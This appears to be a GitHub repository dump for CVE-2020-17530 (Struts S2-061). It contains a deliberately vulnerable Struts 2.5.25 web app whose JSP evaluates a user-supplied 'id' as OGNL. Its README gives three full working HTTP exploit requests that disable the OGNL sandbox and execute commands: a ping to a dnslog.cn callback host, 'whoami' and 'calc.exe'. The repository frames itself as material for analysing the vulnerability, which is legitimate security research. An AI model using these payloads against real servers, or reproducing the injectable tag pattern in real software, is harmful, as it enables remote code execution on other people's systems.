├── CVE-2020-17530
    ├── SimpleStruts.iml
    ├── pom.xml
    └── src
    │   └── main
    │       ├── java
    │           └── org
    │           │   └── heptagram
    │           │       └── action
    │           │           └── IndexAction.java
    │       ├── resources
    │           └── struts.xml
    │       └── webapp
    │           ├── S2061.jsp
    │           ├── WEB-INF
    │               └── web.xml
    │           └── index.jsp
├── README.md
└── image
    ├── DNSLog.png
    ├── SSRF.png
    ├── calc_1.png
    ├── calc_2.jpg
    ├── simpletst.png
    └── system_command.png


/CVE-2020-17530/SimpleStruts.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module version="4">
 3 |   <component name="FacetManager">
 4 |     <facet __external-system-id="Maven" type="web" name="Web">
 5 |       <facet type="Struts2" name="Struts 2">
 6 |         <configuration>
 7 |           <propertiesKeys disabled="false" />
 8 |         </configuration>
 9 |       </facet>
10 |     </facet>
11 |   </component>
12 | </module>


--------------------------------------------------------------------------------
/CVE-2020-17530/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | 
 3 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |   <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |   <groupId>SimpleStruts</groupId>
 8 |   <artifactId>SimpleStruts</artifactId>
 9 |   <version>1.0-SNAPSHOT</version>
10 |   <packaging>war</packaging>
11 | 
12 |   <name>SimpleStruts Maven Webapp</name>
13 |   <!-- FIXME change it to the project's website -->
14 |   <url>http://www.example.com</url>
15 | 
16 |   <properties>
17 |     <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
18 |     <maven.compiler.source>1.8</maven.compiler.source>
19 |     <maven.compiler.target>1.8</maven.compiler.target>
20 |   </properties>
21 | 
22 |   <dependencies>
23 |     <dependency>
24 |       <groupId>junit</groupId>
25 |       <artifactId>junit</artifactId>
26 |       <version>4.11</version>
27 |       <scope>test</scope>
28 |     </dependency>
29 |     <dependency>
30 |       <groupId>org.apache.struts</groupId>
31 |       <artifactId>struts2-core</artifactId>
32 |       <version>2.5.25</version>
33 |     </dependency>
34 |     <dependency>
35 |       <groupId>commons-collections</groupId>
36 |       <artifactId>commons-collections</artifactId>
37 |       <version>3.2.2</version>
38 |     </dependency>
39 |   </dependencies>
40 |   <build>
41 |     <finalName>SimpleStruts</finalName>
42 |     <pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->
43 |       <plugins>
44 |         <plugin>
45 |           <artifactId>maven-clean-plugin</artifactId>
46 |           <version>3.1.0</version>
47 |         </plugin>
48 |         <!-- see http://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_war_packaging -->
49 |         <plugin>
50 |           <artifactId>maven-resources-plugin</artifactId>
51 |           <version>3.0.2</version>
52 |         </plugin>
53 |         <plugin>
54 |           <artifactId>maven-compiler-plugin</artifactId>
55 |           <version>3.8.0</version>
56 |         </plugin>
57 |         <plugin>
58 |           <artifactId>maven-surefire-plugin</artifactId>
59 |           <version>2.22.1</version>
60 |         </plugin>
61 |         <plugin>
62 |           <artifactId>maven-war-plugin</artifactId>
63 |           <version>3.2.2</version>
64 |         </plugin>
65 |         <plugin>
66 |           <artifactId>maven-install-plugin</artifactId>
67 |           <version>2.5.2</version>
68 |         </plugin>
69 |         <plugin>
70 |           <artifactId>maven-deploy-plugin</artifactId>
71 |           <version>2.8.2</version>
72 |         </plugin>
73 |       </plugins>
74 |     </pluginManagement>
75 |   </build>
76 | </project>
77 | 


--------------------------------------------------------------------------------
/CVE-2020-17530/src/main/java/org/heptagram/action/IndexAction.java:
--------------------------------------------------------------------------------
 1 | package org.heptagram.action;
 2 | 
 3 | import com.opensymphony.xwork2.ActionSupport;
 4 | public class IndexAction  extends ActionSupport {
 5 | 
 6 |     private String id;
 7 | 
 8 |     public String getId() {
 9 |         return id;
10 |     }
11 |     public void setId(String id) {
12 |         this.id = id;
13 |     }
14 |     public String Test(){
15 |         return SUCCESS;
16 |     }
17 | }
18 | 


--------------------------------------------------------------------------------
/CVE-2020-17530/src/main/resources/struts.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" ?>
 2 | <!DOCTYPE struts PUBLIC
 3 |         "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"
 4 |         "http://struts.apache.org/dtds/struts-2.0.dtd">
 5 | <struts>
 6 | 
 7 |     <constant name="struts.devMode" value="false"/>
 8 |     <package name="default" namespace="/" extends="struts-default">
 9 |         <default-action-ref name="index"/>
10 |         <action name="S2061" class="org.heptagram.action.IndexAction" method="Test">
11 |             <result>S2061.jsp</result>
12 |         </action>
13 |     </package>
14 | 
15 | </struts>
16 | 


--------------------------------------------------------------------------------
/CVE-2020-17530/src/main/webapp/S2061.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page
 2 |         language="java"
 3 |         contentType="text/html; charset=UTF-8"
 4 |         pageEncoding="UTF-8" %>
 5 | <%@ taglib prefix="s" uri="/struts-tags" %>
 6 | <html>
 7 | <head>
 8 |     <title>S2061</title>
 9 | </head>
10 | <body>
11 | <s:a id="%{id}">SimpleTest</s:a>
12 | </body>
13 | </html>


--------------------------------------------------------------------------------
/CVE-2020-17530/src/main/webapp/WEB-INF/web.xml:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE web-app PUBLIC
 2 |  "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 3 |  "http://java.sun.com/dtd/web-app_2_3.dtd" >
 4 | 
 5 | <web-app>
 6 |   <display-name>Archetype Created Web Application</display-name>
 7 |   <filter>
 8 |     <filter-name>struts2</filter-name>
 9 |     <filter-class>
10 |       org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter
11 |     </filter-class>
12 |   </filter>
13 |   <filter-mapping>
14 |     <filter-name>struts2</filter-name>
15 |     <url-pattern>/*</url-pattern>
16 |   </filter-mapping>
17 | </web-app>
18 | 


--------------------------------------------------------------------------------
/CVE-2020-17530/src/main/webapp/index.jsp:
--------------------------------------------------------------------------------
1 | <html>
2 | <head>
3 |     <title>Hello</title>
4 | </head>
5 | <body>
6 | <h3>Hello World!</h3>
7 | </body>
8 | </html>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## What's this
 2 | This is a Simple test Project for S2-061 which can be used to analysis the detail of this vulnerability.
 3 | 
 4 | ## How to use 
 5 | 
 6 | Step 1:Use IDEA  import this project
 7 | 
 8 | Step 2:setup tomcat Server
 9 | 
10 | Step 3:Use browser access "http://192.168.174.149:8080/SimpleStruts_war_exploded/S2061.action?id=%25%7b8%2a8%7d"
11 | 
12 | ![simpletst](image/simpletst.png)
13 | 
14 | ### How to Exploit
15 | 
16 | ##### SSRF Test
17 | 
18 | ~~~
19 | POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
20 | Host: 192.168.174.149:8080
21 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
22 | Accept-Encoding: gzip, deflate
23 | Accept-Language: zh-CN,zh;q=0.9
24 | Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
25 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
26 | Content-Length: 846
27 | 
28 | ------WebKitFormBoundaryl7d1B1aGsV2wcZwF
29 | Content-Disposition: form-data; name="id"
30 | 
31 | %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping 4ofoqe.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
32 | ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
33 | ~~~
34 | 
35 | ![SSRF](image/SSRF.png)
36 | 
37 | DNSLog：
38 | 
39 | ![DNSLog](image/DNSLog.png)
40 | 
41 | ##### System command
42 | 
43 | ~~~
44 | POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
45 | Host: 192.168.174.149:8080
46 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
47 | Accept-Encoding: gzip, deflate
48 | Accept-Language: zh-CN,zh;q=0.9
49 | Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
50 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
51 | Content-Length: 831
52 | 
53 | ------WebKitFormBoundaryl7d1B1aGsV2wcZwF
54 | Content-Disposition: form-data; name="id"
55 | 
56 | %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
57 | ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
58 | ~~~
59 | 
60 | ![system_command](image/system_command.png)
61 | 
62 | ##### execute calc
63 | 
64 | ~~~
65 | POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
66 | Host: 192.168.174.149:8080
67 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
68 | Accept-Encoding: gzip, deflate
69 | Accept-Language: zh-CN,zh;q=0.9
70 | Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
71 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
72 | Content-Length: 833
73 | 
74 | ------WebKitFormBoundaryl7d1B1aGsV2wcZwF
75 | Content-Disposition: form-data; name="id"
76 | 
77 | %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("calc.exe")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
78 | ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
79 | ~~~
80 | 
81 | ![calc_1](image/calc_1.png)
82 | 
83 | result:![calc_2](image/calc_2.jpg)
84 | 
85 | 
86 | 
87 | 
88 | 
89 | 
90 | 
91 | 


--------------------------------------------------------------------------------
/image/DNSLog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Al1ex/CVE-2020-17530/2ecf245505f72eac7ee4fcf1efeeb819910b0f67/image/DNSLog.png


--------------------------------------------------------------------------------
/image/SSRF.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Al1ex/CVE-2020-17530/2ecf245505f72eac7ee4fcf1efeeb819910b0f67/image/SSRF.png


--------------------------------------------------------------------------------
/image/calc_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Al1ex/CVE-2020-17530/2ecf245505f72eac7ee4fcf1efeeb819910b0f67/image/calc_1.png


--------------------------------------------------------------------------------
/image/calc_2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Al1ex/CVE-2020-17530/2ecf245505f72eac7ee4fcf1efeeb819910b0f67/image/calc_2.jpg


--------------------------------------------------------------------------------
/image/simpletst.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Al1ex/CVE-2020-17530/2ecf245505f72eac7ee4fcf1efeeb819910b0f67/image/simpletst.png


--------------------------------------------------------------------------------
/image/system_command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Al1ex/CVE-2020-17530/2ecf245505f72eac7ee4fcf1efeeb819910b0f67/image/system_command.png


--------------------------------------------------------------------------------